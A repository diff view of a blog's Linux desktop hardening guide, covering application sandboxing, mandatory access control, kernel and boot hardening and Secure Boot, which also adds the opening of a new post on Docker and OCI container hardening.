You can restrict applications further by issuing [Flatpak overrides](https://docs.flatpak.org/en/latest/flatpak-command-reference.html#flatpak-override). This can be done with the command-line or by using [Flatseal](https://flathub.org/apps/details/com.github.tchx84.Flatseal). Some sample overrides are provided by [me](https://github.com/tommytran732/Flatpak-Overrides) and [rusty-snake](https://github.com/rusty-snake/kyst/tree/main/flatpak). Note that this only helps with the lax high level default permissions, but cannot solve the low level issues like `/proc` and `/sys` access, or an insufficient seccomp blacklist.
|
||||
|
||||
Some sensitive permissions you should pay attention to:
|
||||
|
||||
- the Network (`--share=network`) socket (internet access)
|
||||
- the PulseAudio socket (`--socket=pulseaudio`) for audio and sound
|
||||
- `--device=all` access to all devices including the camera
|
||||
- `--talk-name=org.freedesktop.secrets` dbus (access to secrets stored on your keychain) for applications which do not need it
|
||||
|
||||
If an application works natively with Wayland (*not* running through the [XWayland](https://wayland.freedesktop.org/xserver.html) compatibility layer), consider revoking its access to the X11 (`--socket=x11`) and [inter-process communications (IPC)](https://en.wikipedia.org/wiki/Unix_domain_socket) socket (`--share=ipc`) as well.
|
||||
|
||||
Many Flatpak apps come with broad filesystem permissions such as `--filesystem=home` and `--filesystem=host`. Some applications implement the [Portal API](https://docs.flatpak.org/en/latest/portal-api-reference.html), which allows a file manager to pass files to the Flatpak application (e.g. VLC) without specific filesystem access privileges. Despite this, many of them, including ones like VLC [still use](https://github.com/flathub/org.videolan.VLC/blob/master/org.videolan.VLC.json) `--filesystem=host`.
|
||||
|
||||
My strategy to deal with this is to revoke all filesystem access first, then test if an application works without it. If it does, it means the app is already using Portals and I don't need to do anything else. If it doesn't, then I start granting permission to specific directories.
|
||||
|
||||
As odd as this may sound, **you should not do unattended updates with your Flatpak packages**. The problem with Flatpak is that it grants install-time permissions when you update your applications, and you will not be notified of the permission change if you or app store simply executes `flatpak update -y`. Using automatic update with `gnome-software` is fine, as it will not update packages with permission changes, and you have to manually open it's update tab to apply the update.
|
||||
|
||||
### Snap
|
||||
|
||||
Snap is another universal package manager with some sandboxing support. It is developed by Canonical and heavily pushed on Ubuntu.
|
||||
|
||||
Snap packages come in [two variants](https://snapcraft.io/docs/snap-confinement): classic snap with no confinement and strict snap with confinement on systems with AppArmor and Cgroupsv1. If a snap package is classic snap, you are better off using a version provided by your distribution's repository instead, if one is available. If your system does not have AppArmor, then you are better off not using snap at all. Most modern systems outside of Ubuntu and its derivatives only use Cgroupsv2 by default, so you have to set `systemd.unified_cgroup_hierarchy=0` in your kernel parameters to get Cgroupsv1 working.
|
||||
|
||||
Snap permissions can be managed via the Snap Store or Ubuntu's custom patched GNOME Control Center.
|
||||
|
||||
One caveat with Snap packages is that you only have control over the interfaces declared in their manifests. For example, snap has separate interfaces for `audio-playback` and `audio-record`; however, some packages will only declare the legacy `pulseaudio` interface which grants them permission to both play and record audio. Likewise, some applications may work perfectly fine with Wayland, but the package maintainer may only declare the X11 interface in their manifest. For these cases, you need to reach out to the maintainer of the Snap package to update the manifest accordingly.
|
||||
|
||||
### Firejail
|
||||
|
||||
{{< youtube id="N-Mso2bSr3o">}}
|
||||
|
||||
[Firejail](https://firejail.wordpress.com/) is another method of sandboxing. As it is a large [setuid](https://en.wikipedia.org/wiki/Setuid) binary, it has a large attack surface which may assist in [privilege escalation](https://en.wikipedia.org/wiki/Privilege_escalation).
|
||||
|
||||
Madaidan [provided](https://madaidans-insecurities.github.io/linux.html#firejail) additional details on how Firejail can worsen the security of your device.
|
||||
|
||||
If you do use Firejail, there is a tool called [Firetools](https://github.com/netblue30/firetools) which can help you quickly manage what an application can have access to and launch them. Note that the configurations by `Firetools` are temporary and it does not provide you with an option to save a profile for long term use.
|
||||
|
||||
Firejail can also confine X11 windows using Xpra or Xephr, something that Flatpak and Snap cannot do. I highly recommend that you check out their [documentation](https://firejail.wordpress.com/documentation-2/x11-guide/) on how to set this up.
|
||||
|
||||
One trick to consistently launch applications which have a Firejail profile confined is to use the `sudo firecfg` command. This will create a symlink in `/usr/local/bin/app_name_here` pointing to Firejail. `.desktop` files which do not specifically specify the absolute path of the binaries to use will launch the application through the symlink and have Firejail sandbox them this way. Of course, this is bypassable if you or some other applications launch the application directly from `/usr/bin/app_name_here` instead.
|
||||
|
||||
### Mandatory Access Control
|
||||
|
||||
Common Linux [Mandatory access control](https://en.wikipedia.org/wiki/Mandatory_access_control) frameworks require policy files in order to force constraints on the system.
|
||||
|
||||
The two main control systems are [SELinux](https://en.wikipedia.org/wiki/Security-Enhanced_Linux) (used on Android and Fedora based distributions) and [AppArmor](https://en.wikipedia.org/wiki/AppArmor) (Used on Debian based distributions and most openSUSE variants).
|
||||
|
||||
Fedora includes SELinux preconfigured with some policies that will confine [system daemons](https://en.wikipedia.org/wiki/Daemon_(computing)) (background processes). You should keep it in Enforcing mode.
|
||||
|
||||
openSUSE gives the choice of AppArmor or SELinux during the installation process. You should stick to the default for each variant (AppArmor for [Tumbleweed](https://get.opensuse.org/tumbleweed/) and SELinux for [MicroOS](https://microos.opensuse.org/)). openSUSE’s SELinux policies are derived from Fedora.
|
||||
|
||||
Arch and Arch-based operating systems often do not come with a mandatory access control system and you must manually install and configure [AppArmor](https://wiki.archlinux.org/title/AppArmor) for it.
|
||||
|
||||
Note that unlike Android, traditional desktop Linux distributions typically do not have full system Mandatory Access Control policies, and only a few system daemons are actually confined.
|
||||
|
||||
### Making Your Own Policies/Profiles
|
||||
|
||||
You can make your own AppArmor profiles, SELinux policies, Bubblewrap profiles, and [seccomp](https://en.wikipedia.org/wiki/Seccomp) blacklist to have better confinement of applications. This is an advanced and sometimes tedious task, so I won’t go into detail about how to do it here, but there are a few projects that you could use as reference.
|
||||
|
||||
- Whonix’s [AppArmor Everything](https://github.com/Whonix/apparmor-profile-everything)
|
||||
- Krathalan’s [AppArmor profiles](https://github.com/krathalan/apparmor-profiles)
|
||||
- noatsecure’s [SELinux templates](https://github.com/noatsecure/hardhat-selinux-templates)
|
||||
- Seirdy’s [Bubblewrap scripts](https://sr.ht/~seirdy/bwrap-scripts)
|
||||
|
||||
### Securing Linux Containers
|
||||
|
||||
If you’re running a server, you may have heard of Linux Containers. They are more common in server environments where individual services are built to operate independently. However, you may sometimes see them on desktop systems as well, especially for development purposes.
|
||||
|
||||
[Docker](https://en.wikipedia.org/wiki/Docker_(software)) is one of the most common container solutions. It is **not** a proper sandbox, and this means that there is a large kernel attack surface. You should follow the [Docker and OCI Hardening](/posts/apps/docker-and-oci-hardening/) guide to mitigate this problem. In short, there are things you can do like using rootless containers (either through configuration or through using [Podman](https://podman.io/)), using a runtime which provides a psuedo-kernel for each container ([gVisor](https://gvisor.dev/)), and so on.
|
||||
|
||||
Another option is [Kata containers](https://katacontainers.io/), where virtual machines masquerade as containers. Each Kata container has its own Linux kernel and is isolated from the host.
|
||||
|
||||
## Security Hardening
|
||||
|
||||

|
||||
|
||||
### Umask 077
|
||||
If you are not using openSUSE, consider changing the default [umask](https://en.wikipedia.org/wiki/Umask) for both regular user accounts and root to 077. Changing umask to 077 can break snapper on openSUSE and is **not** recommended.
|
||||
|
||||
The configuration for this varies per distribution, but typically it can be set in `/etc/profile`, `/etc/bashrc`, or `/etc/login.defs`.
|
||||
|
||||
Note that unlike on macOS, this will only change the umask for the shell. Files created by running applications will not have their permissions set to 600.
|
||||
|
||||
### Firmware Updates
|
||||
Hardware vendors typically offer updates to Linux systems through the [Linux Vendor Firmware Service](https://fwupd.org/). You can download the updates using the following commands:
|
||||
|
||||
```bash
|
||||
# Update metadata
|
||||
fwupdmgr refresh
|
||||
# Download firmware updates and apply them
|
||||
fwupdmgr update
|
||||
```
|
||||
On a typical desktop Linux system, the desktop enviroment's app store such as `gnome-software`, `discover`, or `snap-store` would integrate with `fwupd` and update your system firmware automatically. However, not all desktop environment/app store have this integration, so you should check your specific system and setup scheduled update tasks using [systemd timers](https://wiki.archlinux.org/title/systemd/Timers) or [cron](https://wiki.archlinux.org/title/Cron) if needed.
|
||||
|
||||
Some distributions like Debian do not have `fwupd` installed by default, so you should check for its existence on your system and install it if needed as well.
|
||||
|
||||
Note that `fwupd` supports UEFI update using the UEFI capsule. This could potentially cause issues if your system gets shutdown in the middle of an update. Unless you have USB FlashBack, you should disable this in your UEFI firmware (it is usually called Windows UEFI Firmware Update) or in `/etc/fwupd/uefi_capsule.conf` by adding `uefi` to the end of the `DisabledPlugins` line.
|
||||
### Firewalls
|
||||
|
||||
A [firewall](https://en.wikipedia.org/wiki/Firewall_(computing)) may be used to secure connections to your system.
|
||||
|
||||
Red Hat distributions (such as Fedora) are typically configured through [firewalld](https://en.wikipedia.org/wiki/Firewalld). Red Hat has plenty of [documentation](https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/configuring_and_managing_networking/using-and-configuring-firewalld_configuring-and-managing-networking) regarding this topic. There is also the [Uncomplicated Firewall](https://en.wikipedia.org/wiki/Uncomplicated_Firewall) which can be used as an alternative.
|
||||
|
||||
You could also set your default firewall zone to drop packets. If you're on a Red Hat or SUSE based distribution such as Fedora this can be done with the following commands:
|
||||
|
||||
```
|
||||
firewall-cmd --set-default-zone=drop
|
||||
firewall-cmd --add-protocol=ipv6-icmp --permanent
|
||||
firewall-cmd --add-service=dhcpv6-client --permanent
|
||||
```
|
||||
|
||||
All these firewalls use the [Netfilter](https://en.wikipedia.org/wiki/Netfilter) framework and therefore cannot protect against malicious programs running on the system. A malicious program could insert its own rules.
|
||||
|
||||
There are some per-binary outbound firewalls such as [OpenSnitch](https://github.com/evilsocket/opensnitch) or [Portmaster](https://safing.io/portmaster/) that you could use as well. But just like firewalld and UFW, they are bypassable.
|
||||
|
||||
If you are using Flatpak packages, you can revoke their network socket access using Flatseal and prevent those applications from accessing your network. This permission is not bypassable.
|
||||
|
||||
If you are using non-classic [Snap](https://en.wikipedia.org/wiki/Snap_(package_manager)) packages on a system with proper snap confinement support (with both AppArmor and [cgroups](https://en.wikipedia.org/wiki/Cgroups) v1 present), you can use the Snap Store to revoke network permission as well. This is also not bypassable.
|
||||
|
||||
### Kernel Hardening
|
||||
There are some additional kernel hardening options such as configuring [sysctl](https://en.wikipedia.org/wiki/Sysctl#Linux) keys and [kernel command-line parameters](https://www.kernel.org/doc/html/latest/admin-guide/kernel-parameters.html) which are described in the Madaidan's guide. You should read through them before applying these changes.
|
||||
|
||||
- [2.2 Sysctl](https://madaidans-insecurities.github.io/guides/linux-hardening.html#sysctl)
|
||||
- [2.5.2 Blacklisting kernel modules](https://madaidans-insecurities.github.io/guides/linux-hardening.html#kasr-kernel-modules)
|
||||
|
||||
Madaidan recommends that you disable unprivileged [user namespaces](https://madaidans-insecurities.github.io/linux.html#kernel) due to it being responsible for various privilege escalation vulnerabilities. However, some software such as Podman and LXD require unprivileged user namespaces to function. If you decide that you want to use these technologies, do not disable `kernel.unprivileged_userns_clone`.
|
||||
|
||||
If you are using KickSecure or Whonix, most of these hardening have already been done for you thanks to [security-misc](https://github.com/Kicksecure/security-misc). If you are using a Debian, you should consider [morphing](https://www.kicksecure.com/wiki/Debian) it into KickSecure. On other distributions, you can copy the configurations from the following files to use:
|
||||
|
||||
- [`/etc/sysctl.d/30_security-misc.conf`](https://github.com/Kicksecure/security-misc/blob/master/etc/sysctl.d/30_security-misc.conf)
|
||||
- [`/etc/sysctl.d/30_silent-kernel-printk.conf`](https://github.com/Kicksecure/security-misc/blob/master/etc/sysctl.d/30_silent-kernel-printk.conf)
|
||||
- [`/etc/modprobe.d/30_security-misc.conf`](https://github.com/Kicksecure/security-misc/blob/master/etc/modprobe.d/30_security-misc.conf)
|
||||
|
||||
Note that these configurations do not disable unprivileged user namespaces. There are also a few things in `/etc/modprobe.d/30_security-misc.conf` to keep in mind:
|
||||
- The `bluetooth` and `btusb` kernel modules are disabled by default. You need to comment out `install bluetooth /bin/disabled-bluetooth-by-security-misc` and `install btusb /bin/disabled-bluetooth-by-security-misc` if you want to use Bluetooth.
|
||||
- Apple filesystems are disabled by default. This is generally fine on non-Apple systems; however, if you are using Linux on an Apple product, you **must** check what filesystem your EFI partition uses. For example, if your EFI filesystem is HFS+, you need to comment out `install hfsplus /bin/disabled-filesys-by-security-misc`, otherwise your computer will not be able to boot into Linux.
|
||||
|
||||
### Harding Boot Parameters
|
||||
|
||||
Read through this section on how to harden your boot parameters:
|
||||
- [2.3 Boot Parameters](https://madaidans-insecurities.github.io/guides/linux-hardening.html#boot-parameters)
|
||||
|
||||
Kicksecure comes with these boot parameters by default. This section is fairly short, so I'd recommend that you read it through. With that being said, here are all of the parameters that you would need:
|
||||
|
||||
```
|
||||
slab_nomerge init_on_alloc=1 init_on_free=1 page_alloc.shuffle=1 pti=on vsyscall=none debugfs=off oops=panic module.sig_enforce=1 lockdown=confidentiality mce=0 quiet loglevel=0 spectre_v2=on spec_store_bypass_disable=on tsx=off tsx_async_abort=full,nosmt mds=full,nosmt l1tf=full,force nosmt=force kvm.nx_huge_pages=force randomize_kstack_offset=on
|
||||
```
|
||||
|
||||
Note that [SMT](https://en.wikipedia.org/wiki/Simultaneous_multithreading) is disabled due to it being the cause of various security vulnerabilities. Also, on rpm-ostree based distributions, you should set the kernel parameters using `rpm-ostree kargs` rather than messing with grub configurations directly.
|
||||
|
||||
### Restricting access to /proc and /sys
|
||||
|
||||
You should read these 2 sections in Madaidan's guide to further reduce the attack surface on the kernel:
|
||||
|
||||
- [2.4 hidepid](https://madaidans-insecurities.github.io/guides/linux-hardening.html#hidepid)
|
||||
- [2.7 Restricting access to sysfs](https://madaidans-insecurities.github.io/guides/linux-hardening.html#restricting-sysfs)
|
||||
|
||||
Disabling access to `/sys` without a proper whitelist will lead to various applications breaking. This will unfortunately be an extremely tedious process for most users. Kicksecure, and by extension, Whonix, has the experimental [proc-hidepid](https://github.com/Kicksecure/security-misc/blob/master/lib/systemd/system/proc-hidepid.service) and [hide-hardware-info](https://github.com/Kicksecure/security-misc/blob/master/lib/systemd/system/hide-hardware-info.service) services which do just this. From my testing, these work perfectly fine on minimal Kicksecure installations and both Qubes-Whonix Workstation and Gateway.
|
||||
|
||||
### linux-hardened
|
||||
|
||||
Some distributions like Arch Linux have the [linux-hardened](https://github.com/anthraxx/linux-hardened) kernel package. It includes [hardening patches](https://wiki.archlinux.org/title/security#Kernel_hardening) and more security-conscious defaults.
|
||||
|
||||
linux-hardened has `kernel.unprivileged_userns_clone=0` disabled by default as well. See the [note above](#kernel-hardening) about how this might impact you.
|
||||
|
||||
### Linux Kernel Runtime Guard (LKRG)
|
||||
|
||||
LKRG is a kernel module that performs runtime integrity check on the kernel to help detect exploits against the kernel. LKRG works in a *post*-detect fashion, attempting to respond to unauthorized modifications to the running Linux kernel. While it is [bypassable by design](https://lkrg.org/), it does stop off-the-shelf malware that does not specifically target LKRG itself. This may make exploits harder to develop and execute on vulnerable systems.
|
||||
|
||||
If you can get LKRG and maintain module updates, it provides a worthwhile improvement to security. Debian-based distributions can get the LKRG DKMS package from KickSecure's repository and the [KickSecure documentation](https://www.kicksecure.com/wiki/Linux_Kernel_Runtime_Guard_LKRG) has installation instructions. Once again, if you are using Debian, consider [morphing](https://www.kicksecure.com/wiki/Debian) it into KickSecure. It should be noted that KickSecure does not currently install LKRG by default, and you will need to run `sudo apt install lkrg-dkms linux-headers-amd64` to obtain it.
|
||||
|
||||
On Fedora, [fepitre](https://github.com/fepitre), a QubesOS developer, has a [COPR repository](https://copr.fedorainfracloud.org/coprs/fepitre/lkrg/) where you can install it. Arch based systems can obtain the LKRG DKMS package via an [AUR package](https://aur.archlinux.org/packages/lkrg-dkms).
|
||||
|
||||
### grsecurity
|
||||
|
||||
grsecurity is a set of kernel patches that attempt to improve security of the Linux kernel. It requires [payment to access](https://grsecurity.net/purchase) the code and is worth using if you have a subscription.
|
||||
|
||||
### Disabling Simultaneous Multithreading (SMT)
|
||||
|
||||
[SMT](https://en.wikipedia.org/wiki/Simultaneous_multithreading) has been the cause of numerous hardware vulnerabilities, and subsequent patches for those vulnerabilities often come with performance penalties that negate a lot of the performance gain given by SMT. If you followed the “Hardening Boot Parameters” section above, some kernel parameters already disable SMT. If the option is available to you, I recommend that you disable it in your firmware as well.
|
||||
|
||||
### Hardened Memory Allocator
|
||||
|
||||
The [hardened memory allocator](https://github.com/GrapheneOS/hardened_malloc) from [GrapheneOS](https://grapheneos.org) can also be used on general Linux distributions. It is available as an [AUR package](https://wiki.archlinux.org/title/Security#Hardened_malloc) on Arch based distributions, and (though not enabled by default) on Whonix and Kicksecure.
|
||||
|
||||
On Fedora, there is currently a build for it by Divested Computing Group that you can find [here](https://github.com/divestedcg/rpm-hardened_malloc)
|
||||
|
||||
If you are using Whonix, Kicksecure or have Hardened_Malloc installed somewhere, consider setting up `LD_PRELOAD` as described in the [Kicksecure Documentation](https://www.kicksecure.com/wiki/Hardened_Malloc) or [Arch Wiki](https://wiki.archlinux.org/title/Security#Hardened_malloc).
|
||||
|
||||
### Mountpoint Hardening
|
||||
|
||||
Consider adding the [following options](https://man7.org/linux/man-pages/man8/mount.8.html) `nodev`, `noexec`, and `nosuid` to mountpoints which do not need them. Typically, these could be applied to `/boot`, `/boot/efi`, and `/var`.
|
||||
|
||||
These flags could also be applied to `/home` and `/root` as well, however, `noexec` will prevent applications from working that require binary execution in those locations. This includes products such as Flatpak and Snap. It should also be noted that this is not fool proof, as `noexec` is bypassable. You can see an example of that [here](https://chromium.googlesource.com/chromiumos/docs/+/HEAD/security/noexec_shell_scripts.md)
|
||||
|
||||
If you use [Toolbox](https://docs.fedoraproject.org/en-US/fedora-silverblue/toolbox/), you should not set any of those options on `/var/log/journal`. From my testing, the Toolbox container will fail to start if you have `nodev`, `nosuid`, or `noexec` on said directory. If you are on Arch Linux, you probably would not want to set `noexec` on `/var/tmp`, as it will make some AUR packages fail to build.
|
||||
|
||||
### Disabling SUID
|
||||
|
||||
SUID allows a user to execute an application as the owner of that application, which in many cases, would be the `root` user. Vulnerable SUID executables could lead to privilege escalation vulnerabilities.
|
||||
|
||||
It is desirable to remove SUID from as many binaries as possible; however, this takes substantial effort and trial and error on the user's part, as some applications require SUID to function.
|
||||
|
||||
Kicksecure, and by extension, Whonix has an experimental [permission hardening service](https://github.com/Kicksecure/security-misc/blob/master/lib/systemd/system/permission-hardening.service) and [application whitelist](https://github.com/Kicksecure/security-misc/tree/master/etc/permission-hardening.d) to automate SUID removal from most binaries and libraries on the system. From my testing, these work perfectly fine on a minimal Kicksecure installation and both Qubes-Whonix Workstation and Gateway.
|
||||
|
||||
If you are using Kicksecure or Whonix, consider enabling the `permission-hardening` service.
|
||||
|
||||
### Securing Time Synchronization
|
||||
|
||||
Most Linux distributions by default (especially distributions with `systemd-timesyncd`) use NTP for time synchronization which is unencrypted and unauthenticated. There are two ways to easily solve this problem:
|
||||
|
||||
- [Configure NTS with chronyd](https://fedoramagazine.org/secure-ntp-with-nts/)
|
||||
- Use [sdwdate](https://github.com/Kicksecure/sdwdate) on Debian based distributions.
|
||||
|
||||
If decide on using NTS with chronyd, consider using multiple different sources to synchronize your time with, and require at least half or more of those providers to actually change the time on your system.
|
||||
|
||||
[GrapheneOS](https://grapheneos.org) actually uses a quite nice configuration for this with their infrastructure. I recommend that you replicate their [`chrony.conf`](https://github.com/GrapheneOS/infrastructure/blob/main/chrony.conf) on your system.
|
||||
|
||||
### Linux Pluggable Authentication Modules (PAM)
|
||||
|
||||
The security of [PAM](https://en.wikipedia.org/wiki/Linux_PAM) can be [hardened](https://madaidans-insecurities.github.io/guides/linux-hardening.html#pam) to allow secure authentication to your system.
|
||||
|
||||
On Red Hat distributions you can use [`authselect`](https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/configuring_authentication_and_authorization_in_rhel/configuring-user-authentication-using-authselect_configuring-authentication-and-authorization-in-rhel) to configure this e.g.:
|
||||
|
||||
```bash
|
||||
sudo authselect select <profile_id, default: sssd> with-faillock without-nullok with-pamaccess
|
||||
```
|
||||
|
||||
On systems where [`pam_faillock`](https://man7.org/linux/man-pages/man8/pam_tally.8.html) is not available, consider using [`pam_tally2`](https://man7.org/linux/man-pages/man8/pam_tally.8.html) instead.
|
||||
|
||||
If you have a Yubikey, you can also use the `pam_u2f` module to require second factor authentication for your login. Follow the [Arch Wiki](https://wiki.archlinux.org/title/Universal_2nd_Factor) documentation for this. Note that you **must** set a non-transient hostname before setting this up, as you will not be able to login when your hostname changes.
|
||||
|
||||
### Storage Media Handling
|
||||
|
||||
Most Linux distributions automatically mount arbitary filesystems from storage medias plugged into the computer. This is a security risk, as an adversary can attach a malicious storage device to your computer to exploit vulnerable filesystem drivers.
|
||||
|
||||
**udisks**
|
||||
|
||||
On systems which use `udisks` to automount and use `GNOME`/`Cinnamon` as their desktop environment, along with `Nautilus`/`Nemo` as the file manager can mitigate this risk by running the following commands:
|
||||
|
||||
```bash
|
||||
echo "[org/gnome/desktop/media-handling]
|
||||
automount=false
|
||||
automount-open=false" | sudo tee /etc/dconf/db/local.d/custom
|
||||
|
||||
sudo dconf update
|
||||
```
|
||||
|
||||
This will set the default `dconf` settings for new users and override all `dconf` settings for existing users. Note that this can be overidden by regular users on your system, simply by changing their individual `dconf` settings.
|
||||
|
||||
**autofs**
|
||||
|
||||
On older systems where `autofs` is used, you should mask the `autofs` service to disable this behavior.
|
||||
|
||||
**Whonix**
|
||||
|
||||
On Whonix, you generally do not need to worry about this behavior since it is disabled by default.
|
||||
|
||||
### USB Port Protection
|
||||
|
||||
To better protect your [USB](https://en.wikipedia.org/wiki/USB) ports from attacks such as [BadUSB](https://en.wikipedia.org/wiki/BadUSB), I recommend [USBGuard](https://github.com/USBGuard/usbguard). USBGuard has [documentation](https://github.com/USBGuard/usbguard#documentation) as does the [Arch Wiki](https://wiki.archlinux.org/title/USBGuard).
|
||||
|
||||
Another alternative option if you’re using the [linux-hardened](#linux-hardened) is the [`deny_new_usb`](https://github.com/GrapheneOS/linux-hardened/commit/96dc427ab60d28129b36362e1577b6673b0ba5c4) sysctl. See [Preventing USB Attacks with `linux-hardened`](https://blog.lizzie.io/preventing-usb-attacks-with-linux-hardened.html).
|
||||
|
||||
## Secure Boot
|
||||
|
||||
[Secure Boot](https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface#Secure_Boot) can be used to secure the boot process by preventing the loading of [unsigned](https://en.wikipedia.org/wiki/Public-key_cryptography) [UEFI](https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface) drivers or [boot loaders](https://en.wikipedia.org/wiki/Bootloader).
|
||||
|
||||
One of the problems with Secure Boot, particularly on Linux is, that only the chainloader (shim), the [boot loader](https://en.wikipedia.org/wiki/Bootloader) (GRUB), and the [kernel](https://en.wikipedia.org/wiki/Kernel_(operating_system)) are verified and that's where verification stops. The [initramfs](https://en.wikipedia.org/wiki/Initial_ramdisk) is often left unverified, unencrypted, and open up the window for an [evil maid](https://en.wikipedia.org/wiki/Evil_maid_attack) attack. The firmware on most devices is also configured to trust Microsoft's keys for Windows and its partners, leading to a large attacks surface.
|
||||
|
||||
To eliminate the need to trust Microsoft's keys, either follow the "Using your own keys" section on the [Arch Wiki](https://wiki.archlinux.org/title/Unified_Extensible_Firmware_Interface/Secure_Boot) or use [sbctl](https://github.com/Foxboron/sbctl). The important thing that needs to be done here is to replace the OEM's key with your own Platform Key.
|
||||
|
||||
There are several ways to work around the unverified initramfs:
|
||||
|
||||
### Encrypted /boot
|
||||
|
||||
The first way is to [encrypt the /boot partition](https://wiki.archlinux.org/title/GRUB#Encrypted_/boot). If you are on Fedora Workstation (not Silverblue), you can follow [this guide](https://mutschler.dev/linux/fedora-btrfs-33/) to convert the existing installation to encrypted `/boot`. openSUSE comes with this that by default.
|
||||
|
||||
Encrypting `/boot` however have its own issues, one being that [GRUB](https://en.wikipedia.org/wiki/GNU_GRUB) does not support LUKS2 well, so you will most likely need to fall back to using the old LUKS1 encryption scheme. In particular, it only supports PBKDF2 key derivation, and not Argon2 (the default with LUKS2). The `grub-install` command, from my own testing, also seems to have trouble detecting LUKS2 volumes, while it works just fine with LUKS1 volumes. Another problem with encrypted `/boot` is that you have to type the encryption password twice, though it could be solved by following the [openSUSE Wiki](https://en.opensuse.org/SDB:Encrypted_root_file_system#Avoiding_to_type_the_passphrase_twice).
|
||||
|
||||
There are a few options depending on your configuration:
|
||||
|
||||
- If you enroll your own keys as described above, and your distribution supports Secure Boot by default, you can add your distribution's EFI Key into the list of trusted keys (db keys). It can then be enrolled into the firmware. Then, you should move all of your keys off your local storage device.
|
||||
- If you enroll your own keys as described above, and your distribution does **not** support Secure Boot out of the box (like Arch Linux), you have to leave the keys on the disk and setup automatic signing of the [kernel](https://wiki.archlinux.org/title/Unified_Extensible_Firmware_Interface/Secure_Boot#Signing_the_kernel_with_a_pacman_hook) and bootloader. If you are using Grub, you can install it with the `--no-shim-lock` option and remove the need for the chainloader.
|
||||
|
||||
### Unified Kernel Image
|
||||
|
||||
The second option is to creating an [Unified Kernel Image](https://wiki.archlinux.org/title/Unified_kernel_image) that contains the kernel, [initramfs](https://en.wikipedia.org/wiki/Initial_ramdisk), and [microcode](https://en.wikipedia.org/wiki/Microcode). This EFI stub can then be signed. I recommend using [sbctl](https://github.com/Foxboron/sbctl) to generate such EFI image. This option also requires you to leave the keys on the disk to setup automatic signing, which weakens the security model.
|
||||
|
||||
### Notes
|
||||
|
||||
After setting up Secure Boot it is crucial that you set a “firmware password” (also called a “supervisor password”, “BIOS password” or “UEFI password”), otherwise an adversary can simply disable Secure Boot.
|
||||
|
||||
These recommendations can make you a little more resistant to [evil maid](https://en.wikipedia.org/wiki/Evil_maid_attack) attacks, but they not good as a proper verified boot process such as that found on [Android](https://source.android.com/security/verifiedboot), [ChromeOS](https://support.google.com/chromebook/answer/3438631) or [Windows](https://docs.microsoft.com/en-us/windows/security/information-protection/secure-the-windows-10-boot-process).
|
258
content/posts/linux/Docker and OCI Hardening.md
Normal file
258
content/posts/linux/Docker and OCI Hardening.md
Normal file
|
@ -0,0 +1,258 @@
|
|||
---
|
||||
title: "Docker and OCI Hardening"
|
||||
date: 2022-03-30T21:23:12Z
|
||||
tags: ['Applications', 'Linux', 'Container', 'Security']
|
||||
author: Wonderfall
|
||||
canonicalURL: https://wonderfall.dev/docker-hardening/
|
||||
ShowCanonicalLink: true
|
||||
---
|
||||
|
||||
Containers aren't that new fancy thing anymore, but they were a big deal. And they still are. They are a concrete solution to the following problem:
|
||||
|
||||
> \- Hey, your software doesn't work...
|
||||
>
|
||||
> \- Sorry, it works on my computer! Can't help you.
|
||||
|
||||
Whether we like them or not, containers are here to stay. Their expressiveness and semantics allow for an abstraction of the OS dependencies that a software has, the latter being often dynamically linked against certain libraries. The developer can therefore provide a known-good environment where it is expected that their software "just works". That is particularly useful for development to eliminate environment-related issues, and that is often used in production as well.
|
||||
|
||||
Containers are often perceived as a great tool for isolation, that is, they can provide an isolated workspace that won't pollute your host OS - all that without the overhead of virtual machines. Security-wise: containers, as we know them on Linux, are glorified namespaces at their core. Containers usually share the same kernel with the host, and **namespaces** is the kernel feature for separating kernel resources across containers (IDs, networks, filesystems, IPC, etc.). Containers also leverage the features of **cgroups** to separate system resources (CPU, memory, etc.), and security features such as seccomp to restrict syscalls, or MACs (AppArmor, SELinux).
|
||||
|
||||
At first, it seems that containers may not provide the same isolation boundary as virtual machines. That's fine, they were not designed to. But they can't be simplified to a simple `chroot` either. We'll see that a "container" can mean a lot of things, and their definition may vary a lot depending on the implementation: as such, containers are mostly defined by their semantics.
|
||||
|
||||
## Docker is dead, long live Docker... and OCI!
|
||||
When people think of containers, a large group of them may think of Docker. While Docker played a big role in the popularity of containers a few years ago, it didn't introduce the technology: on Linux, LXC did (*Linux Containers*). In fact, Docker in its early days was a high-level wrapper for LXC which already combined the power of namespaces and cgroups. Docker then replaced LXC with `libcontainer` which does more or less the same, plus extra features.
|
||||
|
||||
Then, what happened? *Open Container Initiative* (OCI). That is the current standard that defines the container ecosystem. That means that whether you're using Docker, Podman, or Kubernetes, you're in fact running OCI-compliant tools. That is a good thing, as it saves a lot of interoperability headaches.
|
||||
|
||||
**Docker** is no longer the monolithic platform it once was. `libcontainer` was absorbed by `runc`, the reference OCI runtime. The high-level components of Docker split into different parts related to the upstream Moby project (Docker is the "assembled product" of the "Moby components"). When we refer to Docker, we refer in fact at this powerful high-level API that manages OCI containers. By design, Docker is a daemon that communicates with `containerd`, a lower-level layer, which in turn communicates with the OCI runtime. That also means that you could very well skip Docker altogether and use `containerd` or even `runc` directly.
|
||||
|
||||
```
|
||||
Docker client <=> Docker daemon <=> containerd <=> containerd-shim <=> runc
|
||||
```
|
||||
|
||||
**Podman** is an alternative to Docker developed by RedHat, that also intends to be a drop-in replacement for Docker. It doesn't work with a daemon, and can work rootless by design (Docker has support for rootless too, but that is not without caveats). I would largely recommend Podman over Docker for someone who wants a simple tool to run containers and test code on their machine.
|
||||
|
||||
**Kubernetes** (also known as K8S) is the container platform made by Google. It is designed with scaling in mind, and is about running containers across a cluster whereas Docker focuses on packaging containers on a single node. Docker Swarm is the direct alternative to that, but it has never really took off due to the popularity of K8S.
|
||||
|
||||
For the rest of this article, we will use Docker as the reference for our examples, along with the [Compose specification](https://docs.docker.com/compose/compose-file/) format. Most of these examples can be adapted to other platforms without issues.
|
||||
|
||||
## The nightmare of dependencies
|
||||
Containers are made from images, and images are typically built from a Dockerfile. Images can be built and distributed through OCI registries: [Docker Hub](https://hub.docker.com/), [Google Container Registry](https://cloud.google.com/container-registry), [GitHub Container Registry](https://docs.github.com/en/packages/working-with-a-github-packages-registry/working-with-the-container-registry), and so on. You can also set up your own private registry as well, but the reality is that people often pull images from these public registries.
|
||||
|
||||
### Images, immutability and versioning
|
||||
